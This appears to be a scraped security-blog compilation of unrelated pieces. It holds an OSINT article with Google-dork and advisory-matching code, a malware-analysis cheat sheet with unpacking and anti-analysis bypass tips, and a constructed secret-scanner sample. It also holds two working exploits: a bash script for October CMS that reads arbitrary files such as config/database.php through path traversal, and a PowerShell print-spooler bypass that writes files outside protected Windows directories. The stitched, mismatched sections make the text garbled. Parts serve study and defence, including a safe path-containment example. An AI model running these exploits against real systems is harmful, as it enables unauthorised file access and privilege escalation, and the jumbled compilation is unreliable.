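AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
DB_PASSWORD = "changeme"
api_password = 'v9Qp3xL2mZr8Tq1w'
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA(constructed, truncated)
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE_PASTE):
        print(f"line {f['line']:>3}  {f['rule']:<28} {f['value']}")
```

Run against the constructed paste, the scanner reports the AWS key, the high-entropy API password and the private-key header, and drops the "changeme" assignment. The same rules work over a stream of paste-site or code-search results; the entropy threshold is the knob to tune when the generic rule becomes noisy.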

2. Identifying External Threats

As we’ve discussed many times in the past, the internet is an excellent source of insights into an organization’s most pressing threats. From identifying which new vulnerabilities are being actively exploited to intercepting threat actor “chatter” about an upcoming attack, open source intelligence enables security professionals to prioritize their time and resources to address the most significant current threats.

In most cases, this type of work requires an analyst to identify and correlate multiple data points to validate a threat before action is taken. For example, while a single threatening tweet may not be cause for concern, that same tweet would be viewed in a different light if it were tied to a threat group known to be active in a specific industry.

One of the most important things to understand about open source intelligence is that it is often used in combination with other intelligence subtypes. Intelligence from closed sources such as internal telemetry, closed dark web communities, and external intelligence-sharing communities is regularly used to filter and verify open source intelligence. There are a variety of tools available to help analysts perform these functions, which we’ll look at a bit later on.

The Dark Side of Open Source Intelligence

At this point, it’s time to address the second major issue with open source intelligence: if something is readily available to intelligence analysts, it’s also readily available to threat actors.

Threat actors use open source intelligence tools and techniques to identify potential targets and weaknesses in their networks. Once an exposed weakness is identified, exploitation frequently follows quickly, often with public proof-of-concept code or off-the-shelf tooling, to achieve a variety of malicious objectives.

This process is the main reason why so many small and medium-sized enterprises get hacked each year. It isn’t because threat groups specifically take an interest in them, but rather because vulnerabilities in their network or website architecture are found using simple open source intelligence techniques. In short, they are easy targets.

And open source intelligence doesn’t only enable technical attacks on IT systems and networks. Threat actors also seek out information about individuals and organizations that can be used to inform sophisticated social engineering campaigns using phishing (email), vishing (phone or voicemail), and SMiShing (SMS). Often, seemingly innocuous information shared through social networks and blogs can be used to develop highly convincing social engineering campaigns, which in turn are used to trick well-meaning users into compromising their organization’s network or assets.

This is why using open source intelligence for security purposes is so important: it gives you an opportunity to find and fix weaknesses in your organization’s network and remove sensitive information before a threat actor uses the same tools and techniques to exploit them.

Open Source Intelligence Techniques

Now that we’ve covered the uses of open source intelligence (both good and bad) it’s time to look at some of the techniques that can be used to gather and process open source information.

First, you must have a clear strategy and framework in place for acquiring and using open source intelligence. It’s not recommended to approach open source intelligence from the perspective of finding anything and everything that might be interesting or useful — as we’ve already discussed, the sheer volume of information available through open sources will simply overwhelm you.

Instead, you must know exactly what you’re trying to achieve — for example, to identify and remediate weaknesses in your network — and focus your energies specifically on accomplishing those goals.

Second, you must identify a set of tools and techniques for collecting and processing open source information. Once again, the volume of information available is much too great for manual processes to be even slightly effective.

Broadly speaking, collection of open source intelligence falls into two categories: passive collection and active collection.

Passive collection often involves the use of threat intelligence platforms (TIPs) to combine a variety of threat feeds into a single, easily accessible location. While this is a major step up from manual intelligence harvesting, the risk of information overload is still significant. More advanced threat intelligence solutions like Recorded Future solve this problem by using artificial intelligence, machine learning, and natural language processing to automate the process of prioritizing and dismissing alerts based on an organization’s specific needs.

Threat groups run their own form of passive collection too, using botnets for traffic sniffing and keylogging. Note that this is not open source collection under the definition above: it relies on compromised hosts, not on publicly available information.

On the other hand, active collection is the use of a variety of techniques to search for specific insights or information. For security professionals, this type of collection work is usually done for one of two reasons:

  1. A passively collected alert has highlighted a potential threat and further insight is required.
  2. The focus of an intelligence gathering exercise is very specific, such as a penetration testing exercise.

Open Source Intelligence Tools

To close things out, we’ll take a look at some of the most commonly used tools for collecting and processing open source intelligence.

While there are many free and useful tools available to security professionals and threat actors alike, some of the most commonly used (and abused) open source intelligence tools are search engines like Google — just not as most of us know them.

As we’ve already explained, one of the biggest issues facing security professionals is the regularity with which normal, well-meaning users accidentally leave sensitive assets and information exposed to the internet. A set of advanced search queries known as “Google dorks” can be used to identify the information and assets they expose.

Google dork queries are based on the search operators used by IT professionals and hackers on a daily basis to conduct their work. Common examples include “filetype:”, which narrows search results to a specific file type, and “site:”, which only returns results from a specified website or domain.

The Public Intelligence website offers a more thorough rundown of Google dork queries, in which they give the following example search:

“sensitive but unclassified” filetype:pdf site:publicintelligence.net

If you type this search term into a search engine, it returns only PDF documents from the Public Intelligence website that contain the phrase “sensitive but unclassified” somewhere in the document text. With a few dozen operators that can be combined and negated, security professionals and threat actors alike can narrow a search to almost anything.
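Dork queries are worth treating as data rather than as strings typed by hand: you want to generate a standard set for every domain you assess and to pull apart queries you find in the wild. The block below is an added example, not code from the original post or from Public Intelligence. It handles only the commonly documented operators (site:, filetype:, ext:, inurl:, intitle:, intext:), and the exposure templates and the example.com domain are assumptions chosen for illustration.

```python
"""Build and parse search-operator ("Google dork") queries.

Added example, not from the original post. Operators covered and the
EXPOSURE_TEMPLATES below are assumptions for illustration.
"""
import shlex
from typing import Sequence

KNOWN_OPERATORS = {"site", "filetype", "ext", "inurl", "intitle", "intext"}


def parse_dork(query: str) -> dict:
    """Split a query into operator terms and free-text terms.

    Quoted phrases stay together as one term (shlex handles the quoting), a
    leading '-' marks an operator as an exclusion, grouping parentheses are
    stripped and bare OR tokens are skipped.
    Returns {"operators": [(name, value, negated), ...], "terms": [...]}.
    """
    operators, terms = [], []
    for token in shlex.split(query):
        if token.upper() == "OR":
            continue
        token = token.strip("()")
        negated = token.startswith("-")
        body = token[1:] if negated else token
        name, sep, value = body.partition(":")
        if sep and value and name.lower() in KNOWN_OPERATORS:
            operators.append((name.lower(), value, negated))
        elif token:
            terms.append(token)
    return {"operators": operators, "terms": terms}


def build_dork(domain: str, filetypes: Sequence[str] = (), phrases: Sequence[str] = (),
               exclude_paths: Sequence[str] = ()) -> str:
    """Compose a site-scoped query from structured parts.

    Multiple file types are OR-ed inside parentheses; phrases containing spaces
    are quoted so the engine treats them as exact matches; excluded paths become
    -inurl: terms.
    """
    parts = [f"site:{domain}"]
    if filetypes:
        alternatives = " OR ".join(f"filetype:{t}" for t in filetypes)
        parts.append(f"({alternatives})" if len(filetypes) > 1 else alternatives)
    for phrase in phrases:
        parts.append(f'"{phrase}"' if " " in phrase else phrase)
    for path in exclude_paths:
        parts.append(f"-inurl:{path}")
    return " ".join(parts)


# Assumed exposure checks an assessor might run against their own domain.
EXPOSURE_TEMPLATES = {
    "marked_documents": dict(filetypes=["pdf", "docx", "xlsx"], phrases=["internal use only"]),
    "config_files": dict(filetypes=["env", "ini", "yml"], phrases=["password"]),
    "directory_listings": dict(phrases=["index of"], exclude_paths=["blog"]),
}


def exposure_dorks(domain: str) -> dict:
    """Instantiate every template for one domain."""
    return {name: build_dork(domain, **kwargs) for name, kwargs in EXPOSURE_TEMPLATES.items()}


if __name__ == "__main__":
    for name, query in exposure_dorks("example.com").items():
        print(f"{name:<20} {query}")
```

Parsing the Public Intelligence query above yields one free-text phrase and two operators; building from the templates gives a repeatable per-domain checklist, which is what you want when the same exposure review has to be run every quarter.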

Moving beyond search engines, there are literally hundreds of tools that can be used to identify network weaknesses or exposed assets. For example, you can use Wappalyzer to identify which technologies are used on a website, and combine the results with Sploitus or the National Vulnerability Database to determine whether any relevant vulnerabilities exist. Taking things a step further, you could use a more advanced threat intelligence solution like Recorded Future to determine whether a vulnerability is being actively exploited, or is included in any active exploit kits.
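The Wappalyzer-to-NVD step is mostly version-range arithmetic, and it is where checks usually go wrong (a "5.4.1" that is not compared numerically, or a technology with no version that silently drops out). The block below is an added example, not code from the original post and not Wappalyzer's or NVD's own code. The detection input mimics the shape of a Wappalyzer result (technology name plus version); the advisory list is a set of constructed placeholders using the same start-including/end-excluding bounds NVD publishes for CPE matches, not real records; and the CPE strings use the product name as vendor, which in practice must be looked up in the official CPE dictionary.

```python
"""Match detected web technologies against a local advisory list and emit CPE
names for NVD lookups.

Added example, not from the original post. DETECTED mimics a Wappalyzer result;
ADVISORIES are constructed placeholders, not real CVE entries.
"""
import re
from typing import Optional


def parse_version(v: str) -> tuple:
    """'5.4.1' -> (5, 4, 1). Numeric components only; '7.2.0-rc1' -> (7, 2, 0)."""
    parts = []
    for piece in re.split(r"[.\-]", v.strip()):
        if piece.isdigit():
            parts.append(int(piece))
        else:
            break
    return tuple(parts)


def version_in_range(version: str, start_incl: Optional[str] = None,
                     end_excl: Optional[str] = None) -> bool:
    """NVD-style range test: start_incl <= version < end_excl (either bound optional)."""
    v = parse_version(version)
    if start_incl and v < parse_version(start_incl):
        return False
    if end_excl and v >= parse_version(end_excl):
        return False
    return True


def to_cpe(vendor: str, product: str, version: str) -> str:
    """CPE 2.3 formatted string for an application, the key used in NVD searches."""
    return f"cpe:2.3:a:{vendor}:{product}:{version}:*:*:*:*:*:*:*"


# Constructed placeholder advisories; identifiers are not real CVEs.
ADVISORIES = [
    {"id": "EXAMPLE-ADV-1", "product": "wordpress", "start_incl": None, "end_excl": "5.4.2"},
    {"id": "EXAMPLE-ADV-2", "product": "php", "start_incl": "7.3.0", "end_excl": "7.3.12"},
    {"id": "EXAMPLE-ADV-3", "product": "php", "start_incl": "7.4.0", "end_excl": "7.4.11"},
    {"id": "EXAMPLE-ADV-4", "product": "jquery", "start_incl": None, "end_excl": "3.5.0"},
]

# Constructed detection result in the shape a Wappalyzer scan produces.
DETECTED = {
    "url": "https://www.example.com/",
    "technologies": [
        {"name": "WordPress", "version": "5.4.1"},
        {"name": "PHP", "version": "7.4.10"},
        {"name": "jQuery", "version": "3.5.1"},
        {"name": "Nginx", "version": None},
    ],
}


def match_advisories(detected: dict, advisories: list) -> dict:
    """Return {"matches": [...], "unversioned": [...]}.

    Technologies without a version cannot be range-matched and are listed for
    manual follow-up instead of being dropped, because "no match" would
    otherwise be mistaken for "not vulnerable".
    """
    matches, unversioned = [], []
    for tech in detected["technologies"]:
        product = tech["name"].lower()
        version = tech.get("version")
        if not version:
            unversioned.append(tech["name"])
            continue
        for adv in advisories:
            if adv["product"] == product and version_in_range(version, adv["start_incl"], adv["end_excl"]):
                matches.append({
                    "technology": tech["name"],
                    "version": version,
                    "advisory": adv["id"],
                    # Vendor assumed equal to product here; look it up in the CPE dictionary for real use.
                    "cpe": to_cpe(product, product, version),
                })
    return {"matches": matches, "unversioned": unversioned}


if __name__ == "__main__":
    result = match_advisories(DETECTED, ADVISORIES)
    for m in result["matches"]:
        print(f"{m['technology']} {m['version']}: {m['advisory']}  ({m['cpe']})")
    print("needs manual version check:", result["unversioned"])
```

On the constructed input this flags WordPress 5.4.1 and PHP 7.4.10, leaves jQuery 3.5.1 alone because it sits above the advisory's upper bound, and reports Nginx separately because no version was fingerprinted. Swapping ADVISORIES for records pulled from the NVD API is the only change needed to make the matcher real.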

Of course, the examples given here are just a tiny fraction of what is possible using open source intelligence tools. There are a huge number of free and premium tools that can be used to find and analyze open source information, with common functionality including:

  • Metadata search
  • Code search
  • People and identity investigation
  • Phone number research
  • Email search and verification
  • Linking social media accounts
  • Image analysis
  • Geospatial research and mapping
  • Wireless network detection and packet analysis

Start With the End in Mind

Whatever your goals, open source intelligence can be tremendously valuable for all security disciplines. Ultimately, though, finding the right combination of tools and techniques for your specific needs will take time, as well as a degree of trial and error. The tools and techniques you need to identify insecure assets are not the same as those that would help you follow up on a threat alert or connect data points across a variety of sources.

The most important factor in the success of any open source intelligence initiative is the presence of a clear strategy — once you know what you’re trying to accomplish and you’ve set objectives accordingly, identifying the most useful tools and techniques will be much more achievable.


Ubuntu novice cheat sheet


Cheat sheet for Ubuntu beginners

We’ll try to discourage copy-pasting commands. Why? Typing a command yourself helps you memorize it far better than pasting it does.


Cheat Sheet for Analyzing Malicious Software


This cheat sheet presents tips for analyzing and reverse-engineering malware. It outlines the steps for performing behavioral and code-level analysis of malicious software.

Overview of the Malware Analysis Process

  1. Use automated analysis sandbox tools for an initial assessment of the suspicious file.
  2. Set up a controlled, isolated laboratory in which to examine the malware specimen.
  3. Examine static properties and metadata of the specimen for triage and early theories.
  4. Perform behavioral analysis to examine the specimen’s interactions with its environment.
  5. Perform static code analysis to further understand the specimen’s inner workings.
  6. Perform dynamic code analysis to understand the more difficult aspects of the code.
  7. If necessary, unpack the specimen.
  8. Perform memory forensics of the infected lab system to supplement the other findings.
  9. Repeat steps 4-8 above as necessary (the order may vary) until analysis objectives are met.
  10. Document findings, save analysis artifacts and clean-up the laboratory for future analysis.

Behavioral Analysis

Ghidra for Static Code Analysis

Go to specific destination: g
Show references to selected instruction: Ctrl+Shift+f
Insert a comment: ;
Follow jump or call: Enter
Return to previous location: Alt+Left
Go to next view: Alt+Right
Undo: Ctrl+z
Define data type: t
Add a bookmark: Ctrl+d
Text search: Ctrl+Shift+e
Add or edit a label: l
Disassemble selected values: d

x64dbg/x32dbg for Dynamic Code Analysis

Run the code: F9
Step into/over instruction: F7 / F8
Execute until selected instruction: F4
Execute until next return: Ctrl+F9
Show previous/next executed instruction: - / +
Return to previous view: *
Go to specific expression: Ctrl+g
Insert comment/label: ; / :
Show current function as a graph: g
Find specific pattern: Ctrl+b
Set software breakpoint on specific instruction: Select instruction » F2
Set software breakpoint on API: Go to Command prompt » SetBPX API Name
Highlight all occurrences of the keyword in disassembler: h » Click on keyword
Assemble instruction in place of selected one: Select instruction » Spacebar
Edit data in memory or instruction opcode: Select data or instruction » Ctrl+e
Extract API call references: Right-click in disassembler » Search for » Current module » Intermodular calls

Unpacking Malicious Code

  • Determine whether the specimen is packed by using Detect It Easy, Exeinfo PE, Bytehist, peframe, etc.
  • To try unpacking the specimen quickly, infect the lab system and dump from memory using Scylla.
  • For more precision, find the Original Entry Point (OEP) in a debugger and dump with OllyDumpEx.
  • To find the OEP, anticipate the condition close to the end of the unpacker and set the breakpoint.
  • Try setting a memory breakpoint on the stack in the unpacker’s beginning to catch it during cleanup.
  • To get closer to the OEP, set breakpoints on APIs such as LoadLibrary, VirtualAlloc, etc.
  • To intercept process injection set breakpoints on VirtualAllocEx, WriteProcessMemory, etc.
  • If you cannot dump cleanly, examine the packed specimen via dynamic code analysis while it runs.
  • Rebuild imports and other aspects of the dumped file using Scylla, Imports Fixer, UIF, pe_unmapper.

Bypassing Other Analysis Defenses

  • Decode obfuscated strings statically using FLARE, xorsearch, Balbuzard, etc.
  • Decode data in a debugger by setting a breakpoint after the decoding function and examining results.
  • Conceal x64dbg/x32dbg via the ScyllaHide plugin.
  • To disable anti-analysis functionality, locate and patch the defensive code using a debugger.
  • Look out for tricky jumps via TLS, SEH, RET, CALL, etc. when stepping through the code in a debugger.
  • If analyzing shellcode, use scdbg and jmp2it.
  • Disable ASLR via setdllcharacteristics, CFF Explorer.

credits: L Zeltser


October CMS Build 465 – Arbitrary File Read Exploit (Authenticated) 11-13


Date added: 2020-11-13

Just one of many vulnerabilities discovered in this CMS.

# Exploit Title: October CMS Build 465 – Arbitrary File Read Exploit (Authenticated)
# Exploit Author: Sivanesh Ashok
# Vendor Homepage: https://octobercms.com/
# Version: Build 465 and below
# Tested on: Windows 10 / XAMPP / October CMS Build 465
# CVE: CVE-2020-5295

Code:

#!/usr/bin/env bash
# Authenticated arbitrary file read for October CMS <= Build 465 (CVE-2020-5295).
# Needs curl, jq and recode on the attacking host.

cat <<'EOF'
Authenticated arbitrary file read exploit for October CMS <= Build 465
Tested on: v1.0.45
EOF

rm -f /tmp/ocms_* 2> /dev/null

for dep in curl jq recode; do
	if ! command -v "$dep" > /dev/null 2>&1; then
		echo -e "[!] Missing dependency '$dep'\n[!] Install it to resume, e.g.\n\tsudo apt install $dep\n\tsudo pacman -S $dep\n\tyum install $dep"
		echo -e "[*] Exiting!\n"
		exit 1
	fi
done

read -r -p "[*] Enter target host (with http/https): " host
echo ""
read -r -p "[*] Enter your cookie value: " cookie

# Fetch the backend CMS page; the "Assets" nav entry only appears for users allowed to manage theme assets.
curl -s -X GET -H "Cookie: $cookie" "$host/backend/cms" > /tmp/ocms_gethtml

if ! awk '/<span class="nav-label">/,/<\/span>/' /tmp/ocms_gethtml | grep -q "Assets"; then
	echo -e "[-] Invalid cookie\n[-] Either the user does not have the privilege to modify assets or the cookie is invalid"
	echo -e "[*] Exiting!\n"
	exit 1
fi

cat <<'EOF'
[!] Relative path to the target file is required.
	eg. config/database.php
	If you are unsure about the path, check the OctoberCMS GitHub repository, which hosts the default file layout
	https://github.com/octobercms/october
EOF

read -r -p "[*] Enter path to the target file: " targetfile
# The active theme name and the CSRF token are both embedded in the backend page.
themename=$(grep "data-item-theme" /tmp/ocms_gethtml -m 1 | awk -F'"' '{print $6}')
csrftoken=$(grep "csrf-token" /tmp/ocms_gethtml | awk -F'"' '{print $4}')

# The onOpenTemplate AJAX handler opens a theme asset by path; "../../../" escapes the theme's assets directory (the bug).
curl -s -X POST -H "Cookie: $cookie" -H "X-CSRF-TOKEN: $csrftoken" -H "X-OCTOBER-REQUEST-HANDLER: onOpenTemplate" -H "X-Requested-With: XMLHttpRequest" -d "theme=$themename" -d "type=asset" -d "path=../../../$targetfile" "$host/backend/cms" > /tmp/ocms_jsonres

# The file contents come back HTML-encoded inside a <textarea> in the "tab" field of the JSON response.
jq -r '.tab' /tmp/ocms_jsonres 2> /dev/null | awk '/<textarea/,/<\/textarea>/' 2> /dev/null | recode html > /tmp/ocms_file 2> /dev/null

if [[ -s /tmp/ocms_file ]]; then
	cp /tmp/ocms_file ./october_extractedfile
	echo -e "\n[+] File saved as ./october_extractedfile!\n"
	exit 0
else
	echo -e "\n[-] Error extracting file. Check /tmp/ocms_jsonres for the server response. Exiting!\n"
	exit 1
fi
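The handler's mistake is accepting a path parameter and joining it onto the theme's assets directory without checking that the result stays inside that directory. Below is an added example, not October CMS's code or its patch, that shows the unsafe join next to a contained one in Python. The directory layout is constructed in a temporary directory, and the names themes/demo/assets and config/database.php are assumed for illustration.

```python
"""Contain a user-supplied relative path inside a base directory.

Added example illustrating the bug class behind the exploit above; generic
Python, not October CMS's code. The directory layout is constructed in a
temporary directory.
"""
import os
import tempfile


def resolve_in_base(base_dir: str, user_path: str) -> str:
    """Return the absolute target path if it stays under base_dir, else raise ValueError.

    realpath() collapses '..' segments and follows symlinks, so a symlink placed
    inside the base that points outside it is rejected as well. An absolute
    user_path is also rejected, because os.path.join discards the base for it.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return target


def unsafe_open(base_dir: str, user_path: str) -> str:
    """The vulnerable pattern: join and read, with no containment check."""
    with open(os.path.join(base_dir, user_path), encoding="utf-8") as f:
        return f.read()


def safe_open(base_dir: str, user_path: str) -> str:
    """The contained version: same read, but only for paths that resolve under base_dir."""
    with open(resolve_in_base(base_dir, user_path), encoding="utf-8") as f:
        return f.read()


def demo() -> dict:
    """Build a constructed layout (<root>/themes/demo/assets, <root>/config/database.php) and exercise both readers."""
    root = tempfile.mkdtemp()
    assets = os.path.join(root, "themes", "demo", "assets")
    os.makedirs(assets)
    os.makedirs(os.path.join(root, "config"))
    with open(os.path.join(assets, "app.css"), "w", encoding="utf-8") as f:
        f.write("body{}")
    with open(os.path.join(root, "config", "database.php"), "w", encoding="utf-8") as f:
        f.write("<?php // constructed secret config")

    results = {}
    # Three levels up from assets/ is the application root, exactly as in the exploit's "../../../".
    results["unsafe_reads_config"] = unsafe_open(assets, "../../../config/database.php")
    results["safe_reads_asset"] = safe_open(assets, "app.css")
    try:
        safe_open(assets, "../../../config/database.php")
        results["safe_blocked"] = False
    except ValueError:
        results["safe_blocked"] = True
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

The check is deliberately done on the resolved path rather than by stripping "../" from the input, since encoded or doubled traversal sequences and symlinks defeat string filtering but not a comparison of canonical paths.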
            

Microsoft Windows Local Spooler Bypass Vulnerability


One way of exploiting this on Windows 10 200x is to understand that FileNormalizedNameInformation will fail if the new path after the mount point is not under the root directory of the server. For example, the admin$ share points to c:\windows. If you set the mount point to write to c:\Program Files, then the normalization process will fail and the original string is returned. This allows you to write anywhere outside the windows directory by placing a mount point somewhere like system32\tasks.

For example the following script will write the DLL to the root of Program Files.

Windows: Local Spooler CVE-2020-1337 Bypass
 

mkdir "C:\windows\system32\tasks\test"
Add-PrinterDriver -Name "Generic / Text Only"
Add-PrinterPort -Name "\\localhost\admin$\system32\tasks\test\test.dll"
Add-Printer -Name "PrinterExploit" -DriverName "Generic / Text Only" -PortName "\\localhost\admin$\system32\tasks\test\test.dll"
rmdir "C:\windows\system32\tasks\test"
New-Item -ItemType Junction -Path "C:\windows\system32\tasks\test" -Value "C:\Program Files"
"TESTTEST" | Out-Printer -Name "PrinterExploit"
 
 
Related CVE Numbers: CVE-2020-1337, CVE-2020-17001.

Found by: forshaw at google.com